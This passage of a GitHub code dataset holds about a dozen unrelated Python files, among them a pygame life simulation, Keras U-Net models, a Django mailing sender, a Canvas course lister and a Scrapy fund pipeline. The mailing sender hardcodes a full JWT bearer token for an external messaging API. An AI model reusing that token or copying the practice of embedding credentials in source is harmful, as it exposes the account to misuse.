Group.objects.get_or_create(name='manager')\n ct_user = ContentType.objects.get_for_model(User)\n ct_mail = ContentType.objects.get_for_model(Mailing)\n ct_setting = ContentType.objects.get_for_model(SettingMail)\n ct_client = ContentType.objects.get_for_model(Client)\n\n view_user = Permission.objects.get(codename='view_user', name='Can view user', content_type=ct_user)\n change_user = Permission.objects.get(codename='change_user', name='Can change user', content_type=ct_user)\n view_mail = Permission.objects.get(codename='view_mailing', name='Can view сообщение', content_type=ct_mail)\n view_setting = Permission.objects.get(codename='view_settingmail', name='Can view настройка',\n content_type=ct_setting)\n view_client = Permission.objects.get(codename='view_client', name='Can view клиент', content_type=ct_client)\n change_setting = Permission.objects.get(codename='change_settingmail', name='Can change настройка',\n content_type=ct_setting)\n\n new_group.permissions.add(view_user, change_user, view_client, view_mail, view_setting, change_setting)\n","repo_name":"Renntor/Mailing","sub_path":"users/management/commands/create_group.py","file_name":"create_group.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36439773268","text":"import pygame\nimport params\nimport argparse\nimport time\nfrom world import World\n\n# Colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nOUTLINE = (191, 5, 191)\nWATER = (25, 182, 193)\n\n# Map size\nGRID_SIZE = (50, 20)\nBLOCK_SIZE = 30\nLAKE_SIZE = 5\nFOREST_WIDTH = 5\n\n\nclass BoardRenderer:\n \"\"\"\n Handles the drawing & rendering of the game window.\n Displays the main grid of the game.\n \"\"\"\n\n def __init__(self, name, grid_size, block_size):\n self.block_size = block_size\n self.grid_size = grid_size\n self.width, self.height = grid_size\n\n # Init pygame window\n pygame.init()\n pygame.display.set_caption(name)\n self.window = pygame.display.set_mode((self.width * block_size, self.height * block_size))\n\n # Init game fonts\n self.font = pygame.font.SysFont('comicsansms', 18)\n self.counter_font = pygame.font.SysFont('comicsansms', 36)\n\n # Create game board\n self.board = []\n for y in range(0, self.height):\n self.board.append([])\n for x in range(0, self.width):\n self.board[y].append(pygame.Rect(x * block_size, y * block_size, block_size, block_size))\n\n # Other params\n self.background_color = BLACK\n\n def draw_world(self, world):\n \"\"\"\n Renders the game world as a grid of rectangles.\n Yellow rectangles -> blips\n Blue rectangle -> water\n Green rectangles -> forest\n\n :param world: The world simulation\n \"\"\"\n\n # Clear screen\n self.window.fill(self.background_color)\n\n # Draw board\n for y in range(0, self.height):\n for x in range(0, self.width):\n c = BLACK\n\n blip_count = 0\n if world.map[y][x].blips:\n blip_count = len(world.map[y][x].blips)\n\n # Color code the blip's health %\n total_status = (0, 0, 0)\n\n for b in world.map[y][x].blips:\n status = b.get_status()\n total_status = tuple(map(sum, zip(total_status, status)))\n\n # Get average health in case of multiple blips\n hp = min(total_status)\n c = (255, 255 * hp / blip_count, 0)\n\n elif world.map[y][x].type == \"water\":\n c = WATER\n elif world.map[y][x].type == \"forest\":\n # Make sure the tile doesn't disappear completely\n fill_percent = max(world.map[y][x].value / params.FOOD_SIZE, 0.2)\n c = (0, 255 * fill_percent, 0)\n\n pygame.draw.rect(self.window, c, self.board[y][x], 0)\n\n # Add count for multiple blips in a tile\n if blip_count > 1:\n self.add_text(str(blip_count), BLACK, self.board[y][x].center, self.font)\n\n # Draw grid lines\n for i in range(0, self.height):\n screen_y = i * self.block_size\n pygame.draw.line(self.window, OUTLINE, (0, screen_y), (self.width * self.block_size, screen_y), 2)\n for i in range(0, self.width):\n screen_x = i * self.block_size\n pygame.draw.line(self.window, OUTLINE, (screen_x, 0), (screen_x, self.height * self.block_size), 2)\n\n # Write population count\n pos = (self.width * self.block_size / 2, 20)\n self.add_text(str(len(world.blips.keys())), WHITE, pos, self.counter_font)\n\n # Render to screen\n pygame.display.flip()\n\n def add_text(self, text, color, pos, font):\n \"\"\"\n Add text on the screen centered on the given position.\n Does not update the display!\n\n :param text: Text to write on screen\n :param color: Text color to render\n :param pos: Text position on screen\n :param font: The font used to write the text\n \"\"\"\n text = font.render(text, True, color)\n text_rec = text.get_rect(center=pos)\n self.window.blit(text, text_rec)\n\n\ndef init_game():\n \"\"\"\n Creates a new BoardRenderer to display the game and\n a new World to simulate the game.\n\n :return: A tuple (BoardRenderer, Word)\n \"\"\"\n return BoardRenderer('LifeSim', GRID_SIZE, BLOCK_SIZE), World(GRID_SIZE, LAKE_SIZE, FOREST_WIDTH)\n\n\ndef main():\n # Add arg types\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--simple\", help=\"Don't display graphics\", action=\"store_true\")\n parser.add_argument(\"-d\", \"--delay\", help=\"Delay between turns\", type=float)\n parser.add_argument(\"-p\", \"--parameters_file\", help=\"Load parameters from the given file\")\n\n # Parse args\n args = parser.parse_args()\n\n delay = 0\n if args.delay:\n delay = args.delay\n\n if args.parameters_file:\n params.read_params(args.parameters_file)\n\n # Start the game\n renderer, world = init_game()\n\n turn = 0\n population = [0 for _ in range(params.MAX_LIFE)]\n done = False\n while not done:\n # Get input\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.QUIT:\n done = True\n\n # Prepare the next turn\n world.turn_start()\n\n # Update the world\n world.update()\n\n # Complete the current turn\n world.turn_end()\n\n # Draw world\n if not args.simple:\n renderer.draw_world(world)\n\n # Update population buffer\n current = len(world.blips.keys())\n population[turn % params.MAX_LIFE] = current\n if turn >= params.MAX_LIFE - 1:\n # Compute statistic for the period\n avg = sum(population) / len(population)\n best = max(population)\n worst = min(population)\n\n # Check if population has stabilized\n eps = 0.1 * avg\n if abs(best - avg) < eps and abs(worst - avg) < eps:\n done = True\n\n # Print some results in the terminal\n print(\"Best: {0}; Worst: {1}, Avg: {2}, Current {3}\".format(best, worst, avg, current))\n\n turn += 1\n if current == 0:\n done = True\n\n # Time between rounds\n time.sleep(delay)\n\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"andreyciupitu/life-simulation","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":6266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17484430030","text":"import time\nimport serial\n\nser_arduino = serial.Serial(\n port='/dev/ttyUSB0', #Replace ttyS0 with ttyAM0 for Pi1,Pi2,Pi0\n baudrate = 9600,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n)\n\n\ntime.sleep(8)\nser_arduino.write(b\",off,23,23,\")\n\n\n","repo_name":"pasbatron/Project-Barcode-Scaner-Kanban","sub_path":"alarm.py","file_name":"alarm.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3763307617","text":"import numpy as np\nimport keras\nfrom keras.layers import Conv3D, Add, SpatialDropout3D, AveragePooling3D, UpSampling3D, Input, MaxPooling3D, Concatenate, Activation, Multiply, Lambda\nfrom keras.layers import Conv2D, SpatialDropout2D, AveragePooling2D, UpSampling2D, MaxPooling2D, DepthwiseConv2D, Conv2DTranspose, LocallyConnected2D\nfrom DepthwiseConv3D import DepthwiseConv3D\nfrom keras.models import Model, Sequential\nfrom keras.models import model_from_json, load_model\nfrom keras.utils import multi_gpu_model\nfrom keras.utils.np_utils import to_categorical\nfrom keras.regularizers import l1, l2\nimport keras.backend as K\nfrom keras.initializers import Constant\nimport tensorflow as tf\n\nimport settings\nfrom ista import ISTA\n\n\ndef ConvBlock(model_in, filters=settings.options.filters, add=True, drop=True, use_depthwise=settings.options.depthwise):\n kreg = None\n wreg = None\n if settings.options.l1reg:\n kreg=l1(settings.options.l1reg)\n\n if use_depthwise:\n model = DepthwiseConv2D( \\\n kernel_size=(5,5),\n padding='same',\n depth_multiplier=4,\n activation='linear',\n use_bias=False,\n kernel_regularizer=kreg )(model_in)\n model = Conv2D( \\\n filters=filters,\n kernel_size=(1,1),\n padding='same',\n activation=settings.options.activation,\n kernel_regularizer=wreg,\n use_bias=True)(model)\n else:\n model = Conv2D( \\\n filters=filters,\n kernel_size=(3,3),\n padding='same',\n activation=settings.options.activation,\n kernel_regularizer=kreg,\n use_bias=True)(model_in)\n if drop:\n model = SpatialDropout2D(settings.options.dropout)(model)\n if add:\n model = Add()([model_in, model])\n return model\n\n\ndef Block(model, filters):\n if settings.options.densenet:\n model1 = ConvBlock(model, add=False, drop=False, filters=filters)\n model2 = ConvBlock(model1, add=False, drop=False, filters=filters)\n model = Concatenate()([model, model1, model2])\n model = Conv2D( \\\n filters=filters,\n kernel_size=(1,1),\n padding='same',\n activation=settings.options.activation)(model)\n elif settings.options.unet:\n model = ConvBlock(model, add=False, drop=False, filters=filters)\n model = ConvBlock(model, add=False, drop=False, filters=filters)\n elif settings.options.resnet:\n model = ConvBlock(model, add=True, drop=False, filters=filters)\n model = ConvBlock(model, add=True, drop=False, filters=filters)\n return model\n\n\ndef module_mid(model, depth, filters=settings.options.filters):\n if depth==0:\n return Block(model, filters)\n\n else:\n\n m_down = Block(model, filters=filters)\n \n if not settings.options.pocket:\n filters*=2\n m_down = Conv2D( \\\n filters=filters,\n kernel_size=(1,1),\n padding='same',\n activation=None)(m_down)\n m_mid = MaxPooling2D()(m_down)\n \n m_mid = module_mid(m_mid, depth=depth-1, filters=filters)\n \n if not settings.options.pocket:\n filters = int(filters/2)\n\n if settings.options.conv2Dtranspose:\n m_up = Conv2DTranspose( \\\n filters=filters,\n kernel_size=(2,2),\n padding='same',\n activation=None,\n strides=(2,2) )(m_mid)\n else:\n m_up = UpSampling2D()(m_mid)\n if settings.options.pocket:\n m_up = Add()([m_up, m_down])\n else:\n m_up = Concatenate()([m_up, m_down])\n m_up = Conv2D( \\\n filters=filters,\n kernel_size=(1,1),\n padding='same',\n activation=None)(m_up)\n\n m_up = Block(m_up, filters=filters)\n return m_up\n\n\ndef unet(layer_in, depth=settings.options.depth):\n return module_mid(layer_in, depth=depth)\n\ndef CapLayer(layer_in, act_f=None, classes=1):\n layer = SpatialDropout2D(settings.options.dropout)(layer_in)\n layer = Conv2D(\\\n filters=classes,\n kernel_size=(1,1),\n padding='same',\n activation=act_f,\n use_bias=True)(layer)\n return layer\n\n\ndef get_unet_liver():\n _filters = settings.options.filters\n indim = (settings._ny, settings._nx)\n img_in = Input(shape=(*indim, 1))\n\n _features = Conv2D(\\\n filters=_filters,\n kernel_size=(7,7),\n padding='same',\n activation=settings.options.activation)(img_in)\n _unet = unet(_features)\n _unet = Add()([_features, _unet])\n _out = CapLayer(_unet, classes=1, act_f='sigmoid')\n _model = Model(inputs=img_in, outputs=_out)\n _model.summary()\n if settings.options.gpu > 1:\n return multi_gpu_model(_model, gpus=settings.options.gpu)\n return _model\n\ndef get_unet_tumor(liver_model):\n _filters = settings.options.filters\n indim = (settings._ny, settings._nx)\n\n all_in = Input(shape=(*indim, 2))\n\n img = Lambda( lambda x: x[...,0,np.newaxis] )(all_in)\n label = Lambda( lambda x: x[...,1,np.newaxis])(all_in)\n mask = Multiply()([img, label])\n all_in3 = Concatenate()([img, label, mask])\n\n tumor_features = Conv2D(\\\n filters=_filters,\n kernel_size=(7,7),\n padding='same',\n activation=settings.options.activation)(all_in3)\n tumor_unet = unet(tumor_features)\n tumor_out = Add()([tumor_features, tumor_unet])\n tumor_out = CapLayer(tumor_out, classes=1, act_f='sigmoid')\n tumor_model = Model(inputs=all_in, outputs=tumor_out)\n tumor_model.summary()\n# print('\\t preloading weights from liver model...')\n# for i, lyr in enumerate(liver_model.layers):\n# if lyr.name == 'conv2d_1':\n# print(lyr)\n# else:\n# tumor_model.layers[i-4].set_weights(lyr.get_weights())\n\n if settings.options.gpu > 1:\n return multi_gpu_model(tumor_model, gpus=settings.options.gpu)\n return tumor_model\n \ndef get_unet_ensemble(liver_model, tumor_model, tune_liver=False, tune_tumor=True):\n _filters = settings.options.filters\n indim = (settings._ny, settings._nx)\n\n img_in = Input(shape=(*indim, 1))\n\n liver_model.trainable=tune_liver\n liver_seg = liver_model(img_in)\n\n tumor_model.trainable=tune_tumor\n tumor_ins = Concatenate()([img_in, liver_seg])\n tumor_seg = tumor_model(tumor_ins)\n\n two_segs = Concatenate()([liver_seg, tumor_seg])\n model = Model(inputs=img_in, outputs=two_segs)\n if settings.options.gpu > 1:\n model = multi_gpu_model(model, gpus=settings.options.gpu)\n\n return model\n\n","repo_name":"jonasactor/smallnet","sub_path":"tumorhcc-ensemble/buildmodel.py","file_name":"buildmodel.py","file_ext":"py","file_size_in_byte":6858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1234691658","text":"from django.db.models import Sum, Q\nimport requests\nfrom datetime import datetime\nimport pytz\nfrom mailing__mailing.models import Mailing\nfrom mailing__client.models import Client\nfrom mailing__message.models import Message\nfrom mailing__message.views import MessageApiView\n\n\ndef send_mailing(mailing_id):\n mailing_instance = Mailing.objects.filter(id=mailing_id).first()\n if not mailing_instance or mailing_instance.id is None:\n return \"ERROR. Object with mailing id does not exists.\"\n properties_filter = mailing_instance.properties_filter\n if isinstance(properties_filter, list):\n operator_code_filter = []\n tag_filter = []\n for p_filter in properties_filter:\n if \"operator_code\" in p_filter and isinstance(p_filter['operator_code'], str):\n operator_code_filter.append(p_filter['operator_code'])\n if \"tag\" in p_filter and isinstance(p_filter['tag'], str):\n tag_filter.append(p_filter['tag'])\n if len(operator_code_filter) > 0 or len(tag_filter) > 0:\n found_clients = Client.objects.filter(Q(mobile_operator_code__in=operator_code_filter) | Q(tags__name__in=tag_filter)).distinct()\n for client in found_clients:\n try:\n new_msg = Message(sending_status=0, mailing=mailing_instance, client=client)\n new_msg.save()\n send_to_external_api(new_msg.id)\n except Exception as e:\n print(e)\n pass\n return \"ERROR. No clients found by mailing's filter.\"\n\n\ndef send_to_external_api(message_id):\n message_instance = Message.objects.filter(id=message_id).first()\n if not message_instance or message_instance.id is None:\n return \"ERROR. Object with message id does not exists.\"\n access_token = \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MDIwMzE2MTcsImlzcyI6ImZhYnJpcXVlIiwibmFtZSI6Im5pYXlzaGluIn0.vvsO4pdWYCXAfeiGAgaytNJCgEDXzai4phHaIBdyhXE\"\n end_date = message_instance.mailing.end_date\n current_date_utc = datetime.now(pytz.utc)\n if current_date_utc >= end_date:\n try:\n message_instance.sending_status = -1\n message_instance.save()\n except:\n pass\n return \"\"\n response = requests.post(f'https://probe.fbrq.cloud/v1/send/{message_instance.id}', \n headers={'Authorization': f'Bearer {access_token}'},\n json={\n \"id\": message_instance.id, \n \"phone\": message_instance.client.phone_as_int(), \n \"text\": message_instance.mailing.msg_text\n }\n )\n if response.status_code == 200 and response.json()['code'] == 0:\n try:\n message_instance.sending_status = 1\n message_instance.save()\n except:\n pass\n else:\n MessageApiView.retry_sending(message_instance)\n\n","repo_name":"NickG0od/mailing_project_test_task","sub_path":"mailing/mailing__mailing/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13772211376","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.impute import SimpleImputer\n\ndef prep_iris(iris):\n iris = iris.drop(columns=['species_id', 'measurement_id'])\n iris = iris.rename(columns={'species_name':'species'})\n iris_dummy = pd.get_dummies(iris.species, drop_first=True)\n iris = pd.concat([iris, iris_dummy], axis=1)\n return iris\n\ndef prep_titanic(titanic):\n titanic = titanic.set_index('passenger_id').drop(columns=['class', 'embark_town', 'age', 'deck'])\n titanic_dummy = pd.get_dummies(titanic[['sex', 'embarked']], drop_first=[True,True])\n titanic = pd.concat([titanic, titanic_dummy], axis=1)\n return titanic\n\ndef prep_telco(telco):\n telco = telco.set_index('customer_id').drop(columns=['payment_type_id', 'internet_service_type_id', 'contract_type_id', 'paperless_billing'])\n telco = telco.replace(['Yes', 'No'], [1,0])\n telco_dummies = pd.get_dummies(telco[['gender','multiple_lines', 'online_security', 'online_backup', 'device_protection', 'tech_support', 'streaming_tv', 'streaming_movies', 'contract_type', 'internet_service_type', 'payment_type']], drop_first=True)\n telco = pd.concat([telco, telco_dummies], axis=1)\n telco.total_charges = telco.total_charges.replace(' ', 0).astype(float)\n return telco\n\ndef split_data(df, target):\n '''\n take in a DataFrame and return train, validate, and test DataFrames; stratify on survived.\n return train, validate, test DataFrames.\n '''\n train_validate, test = train_test_split(df, test_size=.2, random_state=123, stratify=df[target])\n train, validate = train_test_split(train_validate, \n test_size=.25, \n random_state=123, \n stratify=train_validate[target])\n return train, validate, test","repo_name":"wilson-velasco/classification-exercises","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7994613062","text":"from canvasapi import Canvas\nimport os\nimport sys\nfrom pathlib import Path\nimport csv\n\napi_key = os.environ.get(\"CANVAS_API_KEY\", None)\n\nif api_key is None:\n homedir = os.environ[\"HOME\"]\n # print(\"Home directory is {:s}.\".format(homedir))\n secretsfile = Path(f\"{homedir}/.secrets/canvas-api-key\")\n # print(f\"secretsfile is {secretsfile}.\")\n if os.path.exists(secretsfile) and os.access(secretsfile, os.R_OK):\n with open(secretsfile, \"r\") as f:\n api_key = f.read()\n print(f\"Retrieved CANVAS_API_KEY from {secretsfile}.\")\n\nif api_key is None:\n print(\"This script requires a Canvas API key to be provided\")\n print(\"in the environment variable CANVAS_API_KEY.\")\n print(\"A fallback search in the file {} failed.\".format(secretsfile))\n print(\"That variable remains unset, so execution cannot continue.\")\n sys.exit(1)\n\napi_url = \"https://canvas.ubc.ca\"\ncanvas = Canvas(api_url, api_key)\nme = canvas.get_current_user()\nmy_courses = me.get_courses()\ndel canvas\n\nprint(f\"\\nThe given key identifies {me.name}, \", end=\"\")\nprint(f\"user number {me.id}.\\n\")\n\nprint(f\"User {me.id} has TeacherEnrollment role in the following courses [CSV]:\\n\")\nprint(80 * \"=\")\n\n# Canvas returns many course objects, some with unexpected characteristics.\n# Ignore those in what follows. Build a dict of apparently-relevant ones.\n\ncnum2title = {} # Prefix 'c' indicates 'course number to [course] title'\nfor c in my_courses:\n if hasattr(c, \"course_code\") and hasattr(c, \"enrollments\"):\n for d in c.enrollments:\n # Each d is a dict of roles, etc.\n # If one shows me in the Teacher role, print it and\n # ignore the rest.\n if d[\"user_id\"] == me.id and d[\"role\"] == \"TeacherEnrollment\":\n cnum2title[int(c.id)] = c.name\n\nstdout_ = sys.stdout\ncsvwriter = csv.writer(stdout_, quoting=csv.QUOTE_NONNUMERIC)\ncsvwriter.writerow([\"Canvas ID\", \"Course Name\"])\nfor cnum, ctitle in sorted(cnum2title.items(), key=lambda kv: kv[1]):\n csvwriter.writerow([cnum, ctitle])\n\nsys.exit(0)\n","repo_name":"plomgrading/plom","sub_path":"contrib/canvas-show-courses.py","file_name":"canvas-show-courses.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"13883706324","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom __future__ import print_function, unicode_literals\nfrom wcwidth import wcswidth as ww\nimport sys\nsys.path.append('C:\\\\Users\\\\GerrardLiu\\\\PycharmProjects\\\\Fund\\\\tutorial\\\\tutorial')\nfrom colorama import init\ninit()\nfrom colorama import Fore, Back, Style\nfrom tutorial.items import FundItem, BlockItem, Block1Item, IndexItem\n\n\ndef rpad(s, n, c=' '):\n return s + (n-ww(s)) * c # 对齐\n\n\ninit(autoreset=True)\ninit(wrap=True)\n\n\nclass TutorialPipeline(object):\n def process_item(self, item, spider):\n if isinstance(item, FundItem):\n # profit = 0\n # cur_money = 0\n temp = dict(item)\n # f = open(\"cgf.csv\", 'r')\n # lines = f.readlines()\n # for line in lines:\n # code, money = line.split(\",\")\n # if code == item['code']:\n # cur_money = money\n # f.close()\n temp_list = [temp['name'], temp['percent'], temp['price']]\n if temp_list[1][0] == '-':\n # profit = float(temp_list[1]) * 0.01 * cur_money\n # print(profit)\n temp_list[1] = (Fore.GREEN + temp_list[1] + \"%\" + Style.RESET_ALL)\n else:\n temp_list[1] = (Fore.RED + \"+\" + temp_list[1] + \"%\" + Style.RESET_ALL)\n out = \"{} {} {}\".format(rpad(temp_list[0], 30), rpad(temp_list[1], 15), rpad(temp_list[2], 10))\n print(out)\n print(\"-----------------------------------------------------------------\")\n\n return item\n\n elif isinstance(item, BlockItem):\n temp = dict(item)\n for i in range(5):\n name = temp[\"rise_{}\".format(i + 1)]\n data = temp[\"rise_{}_data\".format(i + 1)]\n if i < 4:\n print(name, \"+\", data, \"%\", \"、\", end='')\n else:\n print(name, \"+\", data, \"%\")\n\n return item\n\n elif isinstance(item, Block1Item):\n temp = dict(item)\n for i in range(5):\n name = temp[\"drop_{}\".format(i + 1)]\n data = temp[\"drop_{}_data\".format(i + 1)]\n if i < 4:\n if data < 0:\n print(name, data, \"%\", \"、\", end='')\n else:\n print(name, \"+\", data, \"%\", \"、\", end='')\n else:\n if data < 0:\n print(name, data, \"%\")\n else:\n print(name, \"+\", data, \"%\")\n return item\n\n elif isinstance(item, IndexItem):\n temp = dict(item)\n temp_list = [temp[\"name\"], temp[\"index\"], temp[\"percent\"], temp[\"data\"]]\n if temp_list[2][0] == '-':\n temp_list[0] = (Fore.GREEN + temp_list[0] + Style.RESET_ALL)\n temp_list[1] = (Fore.GREEN + temp_list[1] + \"↓\" + Style.RESET_ALL)\n temp_list[2] = (Fore.GREEN + temp_list[2] + \"%\" + Style.RESET_ALL)\n temp_list[3] = (Fore.GREEN + temp_list[3] + Style.RESET_ALL)\n else:\n temp_list[0] = (Fore.LIGHTRED_EX + temp_list[0] + Style.RESET_ALL)\n temp_list[1] = (Fore.LIGHTRED_EX + temp_list[1] + \"↑\" + Style.RESET_ALL)\n temp_list[2] = (Fore.LIGHTRED_EX + temp_list[2] + \"%\" + Style.RESET_ALL)\n temp_list[3] = (Fore.LIGHTRED_EX + temp_list[3] + Style.RESET_ALL)\n out = \"{} {} {} {}\".format(rpad(temp_list[0], 2), rpad(temp_list[1], 3), rpad(temp_list[2], 2), rpad(temp_list[3], 2))\n print(out)\n return item\n","repo_name":"yuanl1u/Fund-Surveillance","sub_path":"tutorial/tutorial/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40486044367","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 7 20:38:58 2020\n\n@author: davi\n\"\"\"\n\nimport itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\nfrom multilateration_algorithms import *\nfrom shot import *\n\ndef cil2car(r, theta, z):\n ''' \n changes from cylindrical coordinates to Cartesian coordinates\n obs: theta in radians\n '''\n x = r*np.cos(theta)\n y = r*np.sin(theta)\n return np.array([x, y, z])\n\ndef car2sph(x, y, z):\n ''' \n changes from Cartesian coordinates to spherical coordinates\n obs: theta, phi in degrees\n '''\n if ((x, y, z) == (0, 0, 0)): return np.zeros(3)\n epsilon = 1e-17 # avoid division by zero\n \n R = np.sqrt(x**2 + y**2 + z**2)\n theta_rad = np.arctan(y/(x + epsilon))\n phi_rad = np.arccos(z/(R + epsilon))\n \n theta = (theta_rad/(2*np.pi)) * 360 \n phi = (phi_rad/(2*np.pi)) * 360\n return np.array([R, theta, phi])\n\ndef sph2car(R, phi, theta):\n ''' \n changes from spherical coordinates to Cartesian coordinates\n R : radius\n phi : azimuth angle in radians\n theta : elevation angle in radians\n \n return ndarray with x,y,z Cartesian coordinates\n '''\n x = R*np.sin(theta)*np.cos(phi)\n y = R*np.sin(theta)*np.sin(phi)\n z = R*np.cos(theta)\n return np.array([x, y, z])\n\n# generate cilindrical sources cloud\nr = np.linspace(1, 15, 15) # r is in [1,15] with steps of 1\ntheta = np.linspace(0, 2*np.pi, 24, endpoint=False) # r is in [0,360) with steps of 15 degrees\nz = np.linspace(0, 6, 7) # z is in [-3,3] with steps of 1\n\ncilinder = itertools.product(r, theta, z)\n\n# generate spherical sources cloud\nR = np.linspace(1,15,15)\nphi = np.linspace(0, 2*np.pi,24, endpoint=False)\ntheta = np.linspace(0, np.pi/2, 12, endpoint=True)\n\nnPoints = len(R) * len(phi) * len(theta)\n\n# generate parallelepiped\nX = np.linspace(-10,10,21)\nY = np.linspace(-10,10,21)\nZ = np.linspace(0,10,11)\n\n#nPoints = len(X) * len(Y) * len(Z)\n\n#square (4 microphones)\nsquare_array = np.zeros((4,3))\n\nsquare_array[0] = np.array([-1, 1, 1])\nsquare_array[1] = np.array([-1, -1, -1])\nsquare_array[2] = np.array([1, 1, -1])\nsquare_array[3] = np.array([1, -1, -1])\n#square_array[4] = np.array([0, 0, -1])\n#square_array[5] = np.array([-1, 1, -1])\n\n#our array\nour_array = np.zeros((4,3))\n\nour_array[0] = np.array([-0.83, -0.48, -0.18])\nour_array[1] = np.array([ 0.97, -0.03, 0.23])\nour_array[2] = np.array([ 0.20, 0.20, -0.14])\nour_array[3] = np.array([-0.03, 0.99, -0.12])\n\n#our array2\n\nour_array2 = np.array([[-0.12620505, -0.63363287, -0.15411901],\n [ 0.38171208, -0.03580296, -0.19768694],\n [ 0.02742979, -0.31217145, -0.08820106],\n [-0.48513401, -0.16910477, -0.27557907]])\n\n#spherical (6 microphones)\nspherical_array = np.zeros((6,3))\nspherical_array[0] = np.array([0, 0, 1.5])\nspherical_array[1] = np.array([1, 1, 1])\nspherical_array[2] = np.array([1, -1, 1])\nspherical_array[3] = np.array([-1, 1, 1])\nspherical_array[4] = np.array([-1, -1, 1])\nspherical_array[5] = np.array([0, 0, 0.5])\n\nm = np.array([1, 1, 1, 1, 1, 1])\ne = np.array([0.1, 0.1, 0.1, 0.1, 0.1, 0.1])\n\n# arrays evaluation\nsampleRate = 120000\nsamples = int(sampleRate/2) \narrays = (our_array, our_array2)\nbig_error = [[]]*len(arrays)\n\nfor i,array in enumerate(arrays):\n count=0\n aux = []\n l,_ = np.shape(array)\n #parallelepiped = itertools.product(X, Y, Z)\n semi_sphere = itertools.product(R, phi, theta)\n for (a, b, c) in semi_sphere:\n #source = np.array([a, b, c]) + 0.05*np.random.randn(3)\n source = sph2car(a, b, c) + 0.05*np.random.randn(3)\n \n toa = dist(source, array)/soundSpeed\n tdoa = toa[0] - toa[1:,] \n \n tdoa = np.round(tdoa*sampleRate)/sampleRate\n '''rand = (2*np.random.rand(samples) - 1) # Random vector between 1 and -1\n \n def shot (t):\n decayConst = -10\n relu = (t>=0)\n index = np.sum(~relu)\n r = np.append(np.zeros(index), rand[0:rand.shape[0]-index])\n return r * np.exp(decayConst * t) * relu\n \n tdoa, _ = delayEstimator (shot, sampleRate, source, array, typeComb = \"\")'''\n result = MLE_HLS(array, tdoa, sampleRate, typeComb=\"\")\n \n error = float(dist(source, result))\n #if dist(source, result) > 4.0: big_error.append(source)\n aux.append(error)\n \n count+=1\n if count%500==0: print(count)\n big_error[i] = aux\nbig_error = [sorted(elem) for elem in big_error]\nbig_error = np.array(big_error)\nmle = np.sum(big_error**2, axis=1)/nPoints\n\nplt.title(\"Distance distribution for arrays\")\nplt.plot(big_error[0], c='blue')\nplt.plot(big_error[1], c='green')\nplt.legend([f\"square array(MLE={mle[0]:.2f})\", f\"our array(MLE={mle[1]:.2f})\"])\nplt.xlabel(\"source number\")\nplt.ylabel(\"distance\")\nplt.yscale(\"log\")\nplt.grid()\nplt.show()\n\n","repo_name":"matheussfarias/iOwlT-simulation","sub_path":"arrays_simulation_distribution.py","file_name":"arrays_simulation_distribution.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41011008807","text":"\ndef op_1(command_index, memory):\n\n arg1i = memory[command_index + 1]\n arg2i = memory[command_index + 2]\n resi = memory[command_index + 3]\n\n memory[resi] = memory[arg1i] + memory[arg2i]\n\n return command_index + 4\n\n\ndef op_2(command_index, memory):\n\n arg1i = memory[command_index + 1]\n arg2i = memory[command_index + 2]\n resi = memory[command_index + 3]\n\n memory[resi] = memory[arg1i] * memory[arg2i]\n\n return command_index + 4\n\n\ncommand_to_func = {\n 1: op_1,\n 2: op_2,\n}\n\ndef run_program(memory):\n\n command_index = 0\n\n while True:\n\n command = memory[command_index]\n\n if command == 99:\n break\n else:\n func = command_to_func[command]\n\n command_index = func(command_index, memory)\n\n\ndef run_with_mods(noun, verb, initial_memory):\n memory = initial_memory.copy()\n\n memory[1] = noun\n memory[2] = verb\n\n run_program(memory)\n\n return memory[0]\n\n\nif __name__ == \"__main__\":\n\n with open(\"input.txt\") as file:\n intext = file.read()\n \n splittext = intext.split(\",\")\n memory = [ int(command) for command in splittext ]\n\n successful_params = None\n\n for noun in range(0,100):\n for verb in range(0,100):\n\n result = run_with_mods(noun, verb, memory)\n\n if result == 19690720:\n successful_params = (noun, verb)\n break\n\n if successful_params is not None:\n break\n\n success_noun, success_verb = successful_params\n success_num = (100 * success_noun) + success_verb\n print(success_num)\n ","repo_name":"SimonMarkWhittle/advent_of_code19","sub_path":"day2/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36201573856","text":"from flask import 